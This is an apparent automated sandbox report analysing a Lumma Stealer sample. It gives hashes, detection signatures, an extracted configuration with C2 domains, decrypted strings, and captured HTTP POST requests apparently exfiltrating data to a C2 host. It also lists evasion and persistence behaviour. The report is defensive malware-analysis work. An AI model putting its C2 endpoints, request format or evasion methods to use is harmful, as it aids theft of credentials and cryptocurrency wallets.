Windows Analysis Report
SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe
Analysis ID: 1436372
MD5: 5573f9d646c2ff5c4cd5ee82a5b01e92
SHA1: 6c828b45f929b6747a42470abbdcf307a56953f0
SHA256: 7c4580a23caaebf1a6bf1789f1ef4fad53b72fa736a7b11eb3cb70a089d34486
Tags: exe
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Found malware configuration
Source: 30.2.Buffer.pif.230000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "zippyfinickysofwps.shop"], "Build id": "fuOLMb--"}
Multi AV Scanner detection for domain / URL
Source: https://zippyfinickysofwps.shop/api Virustotal: Detection: 9% Perma Link
Source: sweetsquarediaslw.shop Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Virustotal: Detection: 12% Perma Link
Sample uses string decryption to hide its real strings
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: boredimperissvieos.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: holicisticscrarws.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: sweetsquarediaslw.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: plaintediousidowsko.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: miniaturefinerninewjs.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: zippyfinickysofwps.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: obsceneclassyjuwks.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: acceptabledcooeprs.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: zippyfinickysofwps.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: fuOLMb--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016168A5 CryptUnprotectData, 26_2_016168A5
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00406739 FindFirstFileW,FindClose, 0_2_00406739
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00402902 FindFirstFileW, 0_2_00402902
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405AED
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 18_2_004DE472
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA087
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA1E2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 18_2_004EA570
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AC622 FindFirstFileExW, 18_2_004AC622
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E66DC FindFirstFileW,FindNextFileW,FindClose, 18_2_004E66DC
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E7333 FindFirstFileW,FindClose, 18_2_004E7333
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 18_2_004E73D4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DD921
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DDC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 26_2_0045E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 26_2_0046A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042C622 FindFirstFileExW, 26_2_0042C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004666DC FindFirstFileW,FindNextFileW,FindClose, 26_2_004666DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00467333 FindFirstFileW,FindClose, 26_2_00467333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 26_2_004673D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045D921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045DC54
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h 26_2_01624450
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_0163E6B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov esi, dword ptr [esp+70h] 26_2_01616975
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_01602A60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+04h] 26_2_0163EC50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], al 26_2_01627878
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01627878
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov edi, dword ptr [esi+0Ch] 26_2_01621ADB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [edi], cl 26_2_0162617B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h 26_2_0161817E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp eax 26_2_016222B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esp+10h] 26_2_016165CB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edx, byte ptr [esi+edi] 26_2_016025D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_0163E590
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then lea eax, dword ptr [edi+04h] 26_2_0162475B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h] 26_2_0163C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esi+5Ch] 26_2_016246F8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h 26_2_0161A8F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esi+10h] 26_2_016288F9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], dl 26_2_016288F9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_0163E8D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esp+00000170h] 26_2_01612B63
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then inc ebx 26_2_01614D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+04h] 26_2_0163EF60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movsx ecx, byte ptr [esi+eax] 26_2_0160CF10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_0163AF87
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esi+10h] 26_2_01624E60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx ebx, byte ptr [edx] 26_2_01634E40
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], al 26_2_01616E26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+0Ch] 26_2_0163CE90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov edx, dword ptr [esp+0Ch] 26_2_0163B383
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ebx, eax 26_2_01623269
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [01645A9Ch] 26_2_01617213
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 26_2_016032C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+0Ch] 26_2_0163F2C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then dec edi 26_2_0163F2C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then add ebx, 02h 26_2_016112AC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then inc esi 26_2_016112AC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+70h] 26_2_01617533
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ebx, dword ptr [edi+04h] 26_2_016257B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_016376B1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov word ptr [eax], cx 26_2_0161784E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_016379D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esi+20h] 26_2_0161F870
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov word ptr [eax], cx 26_2_01617853
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_016378C4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edx, word ptr [ebp+eax*4+00h] 26_2_01607D50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov edi, dword ptr [esp] 26_2_01607D50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then push edi 26_2_01613DC9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], al 26_2_01627C5C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01627C5C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ebx, ecx 26_2_0163DC3C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then xor ebx, ebx 26_2_01613F77
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp byte ptr [edx], 00000000h 26_2_01611E79
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+00000080h] 26_2_0161DEF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov word ptr [eax], cx 26_2_0161DEF9

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2052374 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (zippyfinickysofwps .shop) 192.168.2.4:58844 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49739 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49740 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49741 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49742 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49743 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49744 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49746 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49747 -> 104.21.39.216:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1249Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 595320Host: zippyfinickysofwps.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
